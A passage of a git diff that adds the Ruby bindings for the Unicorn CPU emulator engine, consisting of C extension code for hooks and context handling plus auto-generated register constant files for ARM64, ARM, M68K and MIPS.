rb_intern("call"), 4, rUc, UINT2NUM(port), INT2NUM(size), ud)); +} + +static void cb_hook_insn_out(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data){ + struct hook *hook = (struct hook *)user_data; + VALUE cb; + VALUE ud; + VALUE rUc; + + cb = hook->cb; + ud = hook->ud; + rUc = hook->rUc; + rb_funcall(cb, rb_intern("call"), 5, rUc, UINT2NUM(port), INT2NUM(size), UINT2NUM(value), ud); +} + +static void cb_hook_insn_syscall(uc_engine *uc, void *user_data){ + struct hook *hook = (struct hook *)user_data; + VALUE cb; + VALUE ud; + VALUE rUc; + + cb = hook->cb; + ud = hook->ud; + rUc = hook->rUc; + rb_funcall(cb, rb_intern("call"), 2, rUc, ud); +} + +static void cb_hook_intr(uc_engine *uc, uint32_t intno, void *user_data){ + struct hook *hook = (struct hook *)user_data; + VALUE cb; + VALUE ud; + VALUE rUc; + + cb = hook->cb; + ud = hook->ud; + rUc = hook->rUc; + rb_funcall(cb, rb_intern("call"), 3, rUc, ULL2NUM(intno), ud); +} + +static void mark_hook(void *p){ + struct hook *hook = (struct hook *)p; + rb_gc_mark(hook->cb); + rb_gc_mark(hook->ud); + rb_gc_mark(hook->rUc); // just for completeness sake even though this should already be marked +} + +VALUE m_uc_hook_add(int argc, VALUE* argv, VALUE self){ + VALUE hook_type; + VALUE callback; + VALUE user_data; + VALUE begin; + VALUE end; + VALUE arg1; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc); + + rb_scan_args(argc, argv, "24",&hook_type, &callback, &user_data, &begin, &end, &arg1); + if (NIL_P(begin)) + begin = ULL2NUM(1); + + if (NIL_P(end)) + end = ULL2NUM(0); + + if (NIL_P(arg1)) + arg1 = INT2NUM(0); + + uc_err err; + + if (rb_class_of(callback) != rb_cProc) + rb_raise(UcError, "Expected Proc callback"); + + struct hook *hook = (struct hook *)malloc(sizeof(struct hook)); + hook->cb = callback; + hook->ud = user_data; + hook->rUc = self; + VALUE r_hook; + VALUE hooks_list; + r_hook = Data_Wrap_Struct(Hook, mark_hook, free, hook); + hooks_list = rb_iv_get(self, "@hooks"); + rb_ary_push(hooks_list, r_hook); + + uint32_t htype = NUM2UINT(hook_type); + if(htype == UC_HOOK_INSN){ + switch(NUM2INT(arg1)){ + case UC_X86_INS_IN: + err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_insn_in,(void *)hook, NUM2ULL(begin), NUM2ULL(end), NUM2INT(arg1)); + break; + case UC_X86_INS_OUT: + err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_insn_out,(void *)hook, NUM2ULL(begin), NUM2ULL(end), NUM2INT(arg1)); + break; + case UC_X86_INS_SYSCALL: + case UC_X86_INS_SYSENTER: + err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_insn_syscall,(void *)hook, NUM2ULL(begin), NUM2ULL(end), NUM2INT(arg1)); + break; + } + } + else if(htype == UC_HOOK_INTR){ + err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_intr,(void *)hook, NUM2ULL(begin), NUM2ULL(end)); + } + else if(htype == UC_HOOK_CODE || htype == UC_HOOK_BLOCK){ + err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_code,(void *)hook, NUM2ULL(begin), NUM2ULL(end)); + } + else if (htype & UC_HOOK_MEM_READ_UNMAPPED + || htype & UC_HOOK_MEM_WRITE_UNMAPPED + || htype & UC_HOOK_MEM_FETCH_UNMAPPED + || htype & UC_HOOK_MEM_READ_PROT + || htype & UC_HOOK_MEM_WRITE_PROT + || htype & UC_HOOK_MEM_FETCH_PROT + || htype & UC_HOOK_MEM_READ_INVALID + || htype & UC_HOOK_MEM_WRITE_INVALID + || htype & UC_HOOK_MEM_FETCH_INVALID + || htype & UC_HOOK_MEM_UNMAPPED + || htype & UC_HOOK_MEM_PROT + || htype & UC_HOOK_MEM_INVALID) { + err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_mem_invalid,(void *)hook, NUM2ULL(begin), NUM2ULL(end)); + } + else{ + err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_mem_access,(void *)hook, NUM2ULL(begin), NUM2ULL(end)); + } + + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return r_hook; +} + +VALUE m_uc_hook_del(VALUE self, VALUE hook){ + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + struct hook *h; + Data_Get_Struct(hook, struct hook, h); + err = uc_hook_del(_uc, h->trace); + + rb_ary_delete(rb_iv_get(self, "@hooks"), hook); + + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; +} + +VALUE m_uc_query(VALUE self, VALUE query_mode){ + int qm = NUM2INT(query_mode); + size_t result; + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + err = uc_query(_uc, qm, &result); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return INT2NUM(result); +} + +VALUE m_uc_context_save(VALUE self){ + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + + uc_context *_context; + err = uc_context_alloc(_uc, &_context); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + + err = uc_context_save(_uc, _context); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + + VALUE sc = Data_Wrap_Struct(SavedContext, 0, uc_free, _context); + return sc; +} + +VALUE m_uc_context_update(VALUE self, VALUE context){ + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + + uc_context *_context; + Data_Get_Struct(context, uc_context, _context); + + err = uc_context_save(_uc, _context); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; +} + +VALUE m_uc_context_restore(VALUE self, VALUE context){ + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + + uc_context *_context; + Data_Get_Struct(context, uc_context, _context); + + err = uc_context_restore(_uc, _context); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/unicorn.h b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/unicorn.h new file mode 100644 index 0000000..a6cd09a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/unicorn.h @@ -0,0 +1,36 @@ +/* + +Ruby bindings for the Unicorn Emulator Engine + +Copyright(c) 2016 Sascha Schirra + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ +VALUE m_uc_initialize(VALUE self, VALUE arch, VALUE mode); +VALUE m_uc_emu_start(int argc, VALUE* argv, VALUE self); +VALUE m_uc_emu_stop(VALUE self); +VALUE m_uc_reg_read(VALUE self, VALUE reg_id); +VALUE m_uc_reg_write(VALUE self, VALUE reg_id, VALUE reg_value); +VALUE m_uc_mem_read(VALUE self, VALUE address, VALUE size); +VALUE m_uc_mem_write(VALUE self, VALUE address, VALUE bytes); +VALUE m_uc_mem_map(int argc, VALUE* argv, VALUE self); +VALUE m_uc_mem_unmap(VALUE self, VALUE address, VALUE size); +VALUE m_uc_mem_protect(VALUE self, VALUE address, VALUE size, VALUE perms); +VALUE m_uc_hook_add(int argc, VALUE* argv, VALUE self); +VALUE m_uc_hook_del(VALUE self, VALUE hook); +VALUE m_uc_query(VALUE self, VALUE query_mode); +VALUE m_uc_context_save(VALUE self); +VALUE m_uc_context_update(VALUE self, VALUE context); +VALUE m_uc_context_restore(VALUE self, VALUE context); diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/arm64_const.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/arm64_const.rb new file mode 100644 index 0000000..4c98dd0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/arm64_const.rb @@ -0,0 +1,314 @@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [arm64_const.rb] + +module UnicornEngine + +# ARM64 registers + + UC_ARM64_REG_INVALID = 0 + UC_ARM64_REG_X29 = 1 + UC_ARM64_REG_X30 = 2 + UC_ARM64_REG_NZCV = 3 + UC_ARM64_REG_SP = 4 + UC_ARM64_REG_WSP = 5 + UC_ARM64_REG_WZR = 6 + UC_ARM64_REG_XZR = 7 + UC_ARM64_REG_B0 = 8 + UC_ARM64_REG_B1 = 9 + UC_ARM64_REG_B2 = 10 + UC_ARM64_REG_B3 = 11 + UC_ARM64_REG_B4 = 12 + UC_ARM64_REG_B5 = 13 + UC_ARM64_REG_B6 = 14 + UC_ARM64_REG_B7 = 15 + UC_ARM64_REG_B8 = 16 + UC_ARM64_REG_B9 = 17 + UC_ARM64_REG_B10 = 18 + UC_ARM64_REG_B11 = 19 + UC_ARM64_REG_B12 = 20 + UC_ARM64_REG_B13 = 21 + UC_ARM64_REG_B14 = 22 + UC_ARM64_REG_B15 = 23 + UC_ARM64_REG_B16 = 24 + UC_ARM64_REG_B17 = 25 + UC_ARM64_REG_B18 = 26 + UC_ARM64_REG_B19 = 27 + UC_ARM64_REG_B20 = 28 + UC_ARM64_REG_B21 = 29 + UC_ARM64_REG_B22 = 30 + UC_ARM64_REG_B23 = 31 + UC_ARM64_REG_B24 = 32 + UC_ARM64_REG_B25 = 33 + UC_ARM64_REG_B26 = 34 + UC_ARM64_REG_B27 = 35 + UC_ARM64_REG_B28 = 36 + UC_ARM64_REG_B29 = 37 + UC_ARM64_REG_B30 = 38 + UC_ARM64_REG_B31 = 39 + UC_ARM64_REG_D0 = 40 + UC_ARM64_REG_D1 = 41 + UC_ARM64_REG_D2 = 42 + UC_ARM64_REG_D3 = 43 + UC_ARM64_REG_D4 = 44 + UC_ARM64_REG_D5 = 45 + UC_ARM64_REG_D6 = 46 + UC_ARM64_REG_D7 = 47 + UC_ARM64_REG_D8 = 48 + UC_ARM64_REG_D9 = 49 + UC_ARM64_REG_D10 = 50 + UC_ARM64_REG_D11 = 51 + UC_ARM64_REG_D12 = 52 + UC_ARM64_REG_D13 = 53 + UC_ARM64_REG_D14 = 54 + UC_ARM64_REG_D15 = 55 + UC_ARM64_REG_D16 = 56 + UC_ARM64_REG_D17 = 57 + UC_ARM64_REG_D18 = 58 + UC_ARM64_REG_D19 = 59 + UC_ARM64_REG_D20 = 60 + UC_ARM64_REG_D21 = 61 + UC_ARM64_REG_D22 = 62 + UC_ARM64_REG_D23 = 63 + UC_ARM64_REG_D24 = 64 + UC_ARM64_REG_D25 = 65 + UC_ARM64_REG_D26 = 66 + UC_ARM64_REG_D27 = 67 + UC_ARM64_REG_D28 = 68 + UC_ARM64_REG_D29 = 69 + UC_ARM64_REG_D30 = 70 + UC_ARM64_REG_D31 = 71 + UC_ARM64_REG_H0 = 72 + UC_ARM64_REG_H1 = 73 + UC_ARM64_REG_H2 = 74 + UC_ARM64_REG_H3 = 75 + UC_ARM64_REG_H4 = 76 + UC_ARM64_REG_H5 = 77 + UC_ARM64_REG_H6 = 78 + UC_ARM64_REG_H7 = 79 + UC_ARM64_REG_H8 = 80 + UC_ARM64_REG_H9 = 81 + UC_ARM64_REG_H10 = 82 + UC_ARM64_REG_H11 = 83 + UC_ARM64_REG_H12 = 84 + UC_ARM64_REG_H13 = 85 + UC_ARM64_REG_H14 = 86 + UC_ARM64_REG_H15 = 87 + UC_ARM64_REG_H16 = 88 + UC_ARM64_REG_H17 = 89 + UC_ARM64_REG_H18 = 90 + UC_ARM64_REG_H19 = 91 + UC_ARM64_REG_H20 = 92 + UC_ARM64_REG_H21 = 93 + UC_ARM64_REG_H22 = 94 + UC_ARM64_REG_H23 = 95 + UC_ARM64_REG_H24 = 96 + UC_ARM64_REG_H25 = 97 + UC_ARM64_REG_H26 = 98 + UC_ARM64_REG_H27 = 99 + UC_ARM64_REG_H28 = 100 + UC_ARM64_REG_H29 = 101 + UC_ARM64_REG_H30 = 102 + UC_ARM64_REG_H31 = 103 + UC_ARM64_REG_Q0 = 104 + UC_ARM64_REG_Q1 = 105 + UC_ARM64_REG_Q2 = 106 + UC_ARM64_REG_Q3 = 107 + UC_ARM64_REG_Q4 = 108 + UC_ARM64_REG_Q5 = 109 + UC_ARM64_REG_Q6 = 110 + UC_ARM64_REG_Q7 = 111 + UC_ARM64_REG_Q8 = 112 + UC_ARM64_REG_Q9 = 113 + UC_ARM64_REG_Q10 = 114 + UC_ARM64_REG_Q11 = 115 + UC_ARM64_REG_Q12 = 116 + UC_ARM64_REG_Q13 = 117 + UC_ARM64_REG_Q14 = 118 + UC_ARM64_REG_Q15 = 119 + UC_ARM64_REG_Q16 = 120 + UC_ARM64_REG_Q17 = 121 + UC_ARM64_REG_Q18 = 122 + UC_ARM64_REG_Q19 = 123 + UC_ARM64_REG_Q20 = 124 + UC_ARM64_REG_Q21 = 125 + UC_ARM64_REG_Q22 = 126 + UC_ARM64_REG_Q23 = 127 + UC_ARM64_REG_Q24 = 128 + UC_ARM64_REG_Q25 = 129 + UC_ARM64_REG_Q26 = 130 + UC_ARM64_REG_Q27 = 131 + UC_ARM64_REG_Q28 = 132 + UC_ARM64_REG_Q29 = 133 + UC_ARM64_REG_Q30 = 134 + UC_ARM64_REG_Q31 = 135 + UC_ARM64_REG_S0 = 136 + UC_ARM64_REG_S1 = 137 + UC_ARM64_REG_S2 = 138 + UC_ARM64_REG_S3 = 139 + UC_ARM64_REG_S4 = 140 + UC_ARM64_REG_S5 = 141 + UC_ARM64_REG_S6 = 142 + UC_ARM64_REG_S7 = 143 + UC_ARM64_REG_S8 = 144 + UC_ARM64_REG_S9 = 145 + UC_ARM64_REG_S10 = 146 + UC_ARM64_REG_S11 = 147 + UC_ARM64_REG_S12 = 148 + UC_ARM64_REG_S13 = 149 + UC_ARM64_REG_S14 = 150 + UC_ARM64_REG_S15 = 151 + UC_ARM64_REG_S16 = 152 + UC_ARM64_REG_S17 = 153 + UC_ARM64_REG_S18 = 154 + UC_ARM64_REG_S19 = 155 + UC_ARM64_REG_S20 = 156 + UC_ARM64_REG_S21 = 157 + UC_ARM64_REG_S22 = 158 + UC_ARM64_REG_S23 = 159 + UC_ARM64_REG_S24 = 160 + UC_ARM64_REG_S25 = 161 + UC_ARM64_REG_S26 = 162 + UC_ARM64_REG_S27 = 163 + UC_ARM64_REG_S28 = 164 + UC_ARM64_REG_S29 = 165 + UC_ARM64_REG_S30 = 166 + UC_ARM64_REG_S31 = 167 + UC_ARM64_REG_W0 = 168 + UC_ARM64_REG_W1 = 169 + UC_ARM64_REG_W2 = 170 + UC_ARM64_REG_W3 = 171 + UC_ARM64_REG_W4 = 172 + UC_ARM64_REG_W5 = 173 + UC_ARM64_REG_W6 = 174 + UC_ARM64_REG_W7 = 175 + UC_ARM64_REG_W8 = 176 + UC_ARM64_REG_W9 = 177 + UC_ARM64_REG_W10 = 178 + UC_ARM64_REG_W11 = 179 + UC_ARM64_REG_W12 = 180 + UC_ARM64_REG_W13 = 181 + UC_ARM64_REG_W14 = 182 + UC_ARM64_REG_W15 = 183 + UC_ARM64_REG_W16 = 184 + UC_ARM64_REG_W17 = 185 + UC_ARM64_REG_W18 = 186 + UC_ARM64_REG_W19 = 187 + UC_ARM64_REG_W20 = 188 + UC_ARM64_REG_W21 = 189 + UC_ARM64_REG_W22 = 190 + UC_ARM64_REG_W23 = 191 + UC_ARM64_REG_W24 = 192 + UC_ARM64_REG_W25 = 193 + UC_ARM64_REG_W26 = 194 + UC_ARM64_REG_W27 = 195 + UC_ARM64_REG_W28 = 196 + UC_ARM64_REG_W29 = 197 + UC_ARM64_REG_W30 = 198 + UC_ARM64_REG_X0 = 199 + UC_ARM64_REG_X1 = 200 + UC_ARM64_REG_X2 = 201 + UC_ARM64_REG_X3 = 202 + UC_ARM64_REG_X4 = 203 + UC_ARM64_REG_X5 = 204 + UC_ARM64_REG_X6 = 205 + UC_ARM64_REG_X7 = 206 + UC_ARM64_REG_X8 = 207 + UC_ARM64_REG_X9 = 208 + UC_ARM64_REG_X10 = 209 + UC_ARM64_REG_X11 = 210 + UC_ARM64_REG_X12 = 211 + UC_ARM64_REG_X13 = 212 + UC_ARM64_REG_X14 = 213 + UC_ARM64_REG_X15 = 214 + UC_ARM64_REG_X16 = 215 + UC_ARM64_REG_X17 = 216 + UC_ARM64_REG_X18 = 217 + UC_ARM64_REG_X19 = 218 + UC_ARM64_REG_X20 = 219 + UC_ARM64_REG_X21 = 220 + UC_ARM64_REG_X22 = 221 + UC_ARM64_REG_X23 = 222 + UC_ARM64_REG_X24 = 223 + UC_ARM64_REG_X25 = 224 + UC_ARM64_REG_X26 = 225 + UC_ARM64_REG_X27 = 226 + UC_ARM64_REG_X28 = 227 + UC_ARM64_REG_V0 = 228 + UC_ARM64_REG_V1 = 229 + UC_ARM64_REG_V2 = 230 + UC_ARM64_REG_V3 = 231 + UC_ARM64_REG_V4 = 232 + UC_ARM64_REG_V5 = 233 + UC_ARM64_REG_V6 = 234 + UC_ARM64_REG_V7 = 235 + UC_ARM64_REG_V8 = 236 + UC_ARM64_REG_V9 = 237 + UC_ARM64_REG_V10 = 238 + UC_ARM64_REG_V11 = 239 + UC_ARM64_REG_V12 = 240 + UC_ARM64_REG_V13 = 241 + UC_ARM64_REG_V14 = 242 + UC_ARM64_REG_V15 = 243 + UC_ARM64_REG_V16 = 244 + UC_ARM64_REG_V17 = 245 + UC_ARM64_REG_V18 = 246 + UC_ARM64_REG_V19 = 247 + UC_ARM64_REG_V20 = 248 + UC_ARM64_REG_V21 = 249 + UC_ARM64_REG_V22 = 250 + UC_ARM64_REG_V23 = 251 + UC_ARM64_REG_V24 = 252 + UC_ARM64_REG_V25 = 253 + UC_ARM64_REG_V26 = 254 + UC_ARM64_REG_V27 = 255 + UC_ARM64_REG_V28 = 256 + UC_ARM64_REG_V29 = 257 + UC_ARM64_REG_V30 = 258 + UC_ARM64_REG_V31 = 259 + +# pseudo registers + UC_ARM64_REG_PC = 260 + UC_ARM64_REG_CPACR_EL1 = 261 + +# thread registers + UC_ARM64_REG_TPIDR_EL0 = 262 + UC_ARM64_REG_TPIDRRO_EL0 = 263 + UC_ARM64_REG_TPIDR_EL1 = 264 + UC_ARM64_REG_PSTATE = 265 + +# exception link registers + UC_ARM64_REG_ELR_EL0 = 266 + UC_ARM64_REG_ELR_EL1 = 267 + UC_ARM64_REG_ELR_EL2 = 268 + UC_ARM64_REG_ELR_EL3 = 269 + +# stack pointers registers + UC_ARM64_REG_SP_EL0 = 270 + UC_ARM64_REG_SP_EL1 = 271 + UC_ARM64_REG_SP_EL2 = 272 + UC_ARM64_REG_SP_EL3 = 273 + +# other CP15 registers + UC_ARM64_REG_TTBR0_EL1 = 274 + UC_ARM64_REG_TTBR1_EL1 = 275 + UC_ARM64_REG_ESR_EL0 = 276 + UC_ARM64_REG_ESR_EL1 = 277 + UC_ARM64_REG_ESR_EL2 = 278 + UC_ARM64_REG_ESR_EL3 = 279 + UC_ARM64_REG_FAR_EL0 = 280 + UC_ARM64_REG_FAR_EL1 = 281 + UC_ARM64_REG_FAR_EL2 = 282 + UC_ARM64_REG_FAR_EL3 = 283 + UC_ARM64_REG_PAR_EL1 = 284 + UC_ARM64_REG_MAIR_EL1 = 285 + UC_ARM64_REG_VBAR_EL0 = 286 + UC_ARM64_REG_VBAR_EL1 = 287 + UC_ARM64_REG_VBAR_EL2 = 288 + UC_ARM64_REG_VBAR_EL3 = 289 + UC_ARM64_REG_ENDING = 290 + +# alias registers + UC_ARM64_REG_IP0 = 215 + UC_ARM64_REG_IP1 = 216 + UC_ARM64_REG_FP = 1 + UC_ARM64_REG_LR = 2 +end \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/arm_const.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/arm_const.rb new file mode 100644 index 0000000..15df353 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/arm_const.rb @@ -0,0 +1,135 @@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [arm_const.rb] + +module UnicornEngine + +# ARM registers + + UC_ARM_REG_INVALID = 0 + UC_ARM_REG_APSR = 1 + UC_ARM_REG_APSR_NZCV = 2 + UC_ARM_REG_CPSR = 3 + UC_ARM_REG_FPEXC = 4 + UC_ARM_REG_FPINST = 5 + UC_ARM_REG_FPSCR = 6 + UC_ARM_REG_FPSCR_NZCV = 7 + UC_ARM_REG_FPSID = 8 + UC_ARM_REG_ITSTATE = 9 + UC_ARM_REG_LR = 10 + UC_ARM_REG_PC = 11 + UC_ARM_REG_SP = 12 + UC_ARM_REG_SPSR = 13 + UC_ARM_REG_D0 = 14 + UC_ARM_REG_D1 = 15 + UC_ARM_REG_D2 = 16 + UC_ARM_REG_D3 = 17 + UC_ARM_REG_D4 = 18 + UC_ARM_REG_D5 = 19 + UC_ARM_REG_D6 = 20 + UC_ARM_REG_D7 = 21 + UC_ARM_REG_D8 = 22 + UC_ARM_REG_D9 = 23 + UC_ARM_REG_D10 = 24 + UC_ARM_REG_D11 = 25 + UC_ARM_REG_D12 = 26 + UC_ARM_REG_D13 = 27 + UC_ARM_REG_D14 = 28 + UC_ARM_REG_D15 = 29 + UC_ARM_REG_D16 = 30 + UC_ARM_REG_D17 = 31 + UC_ARM_REG_D18 = 32 + UC_ARM_REG_D19 = 33 + UC_ARM_REG_D20 = 34 + UC_ARM_REG_D21 = 35 + UC_ARM_REG_D22 = 36 + UC_ARM_REG_D23 = 37 + UC_ARM_REG_D24 = 38 + UC_ARM_REG_D25 = 39 + UC_ARM_REG_D26 = 40 + UC_ARM_REG_D27 = 41 + UC_ARM_REG_D28 = 42 + UC_ARM_REG_D29 = 43 + UC_ARM_REG_D30 = 44 + UC_ARM_REG_D31 = 45 + UC_ARM_REG_FPINST2 = 46 + UC_ARM_REG_MVFR0 = 47 + UC_ARM_REG_MVFR1 = 48 + UC_ARM_REG_MVFR2 = 49 + UC_ARM_REG_Q0 = 50 + UC_ARM_REG_Q1 = 51 + UC_ARM_REG_Q2 = 52 + UC_ARM_REG_Q3 = 53 + UC_ARM_REG_Q4 = 54 + UC_ARM_REG_Q5 = 55 + UC_ARM_REG_Q6 = 56 + UC_ARM_REG_Q7 = 57 + UC_ARM_REG_Q8 = 58 + UC_ARM_REG_Q9 = 59 + UC_ARM_REG_Q10 = 60 + UC_ARM_REG_Q11 = 61 + UC_ARM_REG_Q12 = 62 + UC_ARM_REG_Q13 = 63 + UC_ARM_REG_Q14 = 64 + UC_ARM_REG_Q15 = 65 + UC_ARM_REG_R0 = 66 + UC_ARM_REG_R1 = 67 + UC_ARM_REG_R2 = 68 + UC_ARM_REG_R3 = 69 + UC_ARM_REG_R4 = 70 + UC_ARM_REG_R5 = 71 + UC_ARM_REG_R6 = 72 + UC_ARM_REG_R7 = 73 + UC_ARM_REG_R8 = 74 + UC_ARM_REG_R9 = 75 + UC_ARM_REG_R10 = 76 + UC_ARM_REG_R11 = 77 + UC_ARM_REG_R12 = 78 + UC_ARM_REG_S0 = 79 + UC_ARM_REG_S1 = 80 + UC_ARM_REG_S2 = 81 + UC_ARM_REG_S3 = 82 + UC_ARM_REG_S4 = 83 + UC_ARM_REG_S5 = 84 + UC_ARM_REG_S6 = 85 + UC_ARM_REG_S7 = 86 + UC_ARM_REG_S8 = 87 + UC_ARM_REG_S9 = 88 + UC_ARM_REG_S10 = 89 + UC_ARM_REG_S11 = 90 + UC_ARM_REG_S12 = 91 + UC_ARM_REG_S13 = 92 + UC_ARM_REG_S14 = 93 + UC_ARM_REG_S15 = 94 + UC_ARM_REG_S16 = 95 + UC_ARM_REG_S17 = 96 + UC_ARM_REG_S18 = 97 + UC_ARM_REG_S19 = 98 + UC_ARM_REG_S20 = 99 + UC_ARM_REG_S21 = 100 + UC_ARM_REG_S22 = 101 + UC_ARM_REG_S23 = 102 + UC_ARM_REG_S24 = 103 + UC_ARM_REG_S25 = 104 + UC_ARM_REG_S26 = 105 + UC_ARM_REG_S27 = 106 + UC_ARM_REG_S28 = 107 + UC_ARM_REG_S29 = 108 + UC_ARM_REG_S30 = 109 + UC_ARM_REG_S31 = 110 + UC_ARM_REG_C1_C0_2 = 111 + UC_ARM_REG_C13_C0_2 = 112 + UC_ARM_REG_C13_C0_3 = 113 + UC_ARM_REG_IPSR = 114 + UC_ARM_REG_MSP = 115 + UC_ARM_REG_PSP = 116 + UC_ARM_REG_CONTROL = 117 + UC_ARM_REG_ENDING = 118 + +# alias registers + UC_ARM_REG_R13 = 12 + UC_ARM_REG_R14 = 10 + UC_ARM_REG_R15 = 11 + UC_ARM_REG_SB = 75 + UC_ARM_REG_SL = 76 + UC_ARM_REG_FP = 77 + UC_ARM_REG_IP = 78 +end \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/m68k_const.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/m68k_const.rb new file mode 100644 index 0000000..dc64153 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/m68k_const.rb @@ -0,0 +1,27 @@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [m68k_const.rb] + +module UnicornEngine + +# M68K registers + + UC_M68K_REG_INVALID = 0 + UC_M68K_REG_A0 = 1 + UC_M68K_REG_A1 = 2 + UC_M68K_REG_A2 = 3 + UC_M68K_REG_A3 = 4 + UC_M68K_REG_A4 = 5 + UC_M68K_REG_A5 = 6 + UC_M68K_REG_A6 = 7 + UC_M68K_REG_A7 = 8 + UC_M68K_REG_D0 = 9 + UC_M68K_REG_D1 = 10 + UC_M68K_REG_D2 = 11 + UC_M68K_REG_D3 = 12 + UC_M68K_REG_D4 = 13 + UC_M68K_REG_D5 = 14 + UC_M68K_REG_D6 = 15 + UC_M68K_REG_D7 = 16 + UC_M68K_REG_SR = 17 + UC_M68K_REG_PC = 18 + UC_M68K_REG_ENDING = 19 +end \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/mips_const.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/mips_const.rb new file mode 100644 index 0000000..9e8d52e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/lib/unicorn_engine/mips_const.rb @@ -0,0 +1,200 @@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [mips_const.rb] + +module UnicornEngine + +# MIPS registers + + UC_MIPS_REG_INVALID = 0 + +# General purpose registers + UC_MIPS_REG_PC = 1 + UC_MIPS_REG_0 = 2 + UC_MIPS_REG_1 = 3 + UC_MIPS_REG_2 = 4 + UC_MIPS_REG_3 = 5 + UC_MIPS_REG_4 = 6 + UC_MIPS_REG_5 = 7 + UC_MIPS_REG_6 = 8 + UC_MIPS_REG_7 = 9 + UC_MIPS_REG_8 = 10 + UC_MIPS_REG_9 = 11 + UC_MIPS_REG_10 = 12 + UC_MIPS_REG_11 = 13 + UC_MIPS_REG_12 = 14 + UC_MIPS_REG_13 = 15 + UC_MIPS_REG_14 = 16 + UC_MIPS_REG_15 = 17 + UC_MIPS_REG_16 = 18 + UC_MIPS_REG_17 = 19 + UC_MIPS_REG_18 = 20 + UC_MIPS_REG_19 = 21 + UC_MIPS_REG_20 = 22 + UC_MIPS_REG_21 = 23 + UC_MIPS_REG_22 = 24 + UC_MIPS_REG_23 = 25 + UC_MIPS_REG_24 = 26 + UC_MIPS_REG_25 = 27 + UC_MIPS_REG_26 = 28 + UC_MIPS_REG_27 = 29 + UC_MIPS_REG_28 = 30 + UC_MIPS_REG_29 = 31 + UC_MIPS_REG_30 = 32 + UC_MIPS_REG_31 = 33 + +# DSP registers + UC_MIPS_REG_DSPCCOND = 34 + UC_MIPS_REG_DSPCARRY = 35 + UC_MIPS_REG_DSPEFI = 36 + UC_MIPS_REG_DSPOUTFLAG = 37 + UC_MIPS_REG_DSPOUTFLAG16_19 = 38 + UC_MIPS_REG_DSPOUTFLAG20 = 39 + UC_MIPS_REG_DSPOUTFLAG21 = 40 + UC_MIPS_REG_DSPOUTFLAG22 = 41 + UC_MIPS_REG_DSPOUTFLAG23 = 42 + UC_MIPS_REG_DSPPOS = 43 + UC_MIPS_REG_DSPSCOUNT = 44 + +# ACC registers + UC_MIPS_REG_AC0 = 45 + UC_MIPS_REG_AC1 = 46 + UC_MIPS_REG_AC2 = 47 + UC_MIPS_REG_AC3 = 48 + +# COP registers + UC_MIPS_REG_CC0 = 49 + UC_MIPS_REG_CC1 = 50 + UC_MIPS_REG_CC2 = 51 + UC_MIPS_REG_CC3 = 52 + UC_MIPS_REG_CC4 = 53 + UC_MIPS_REG_CC5 = 54 + 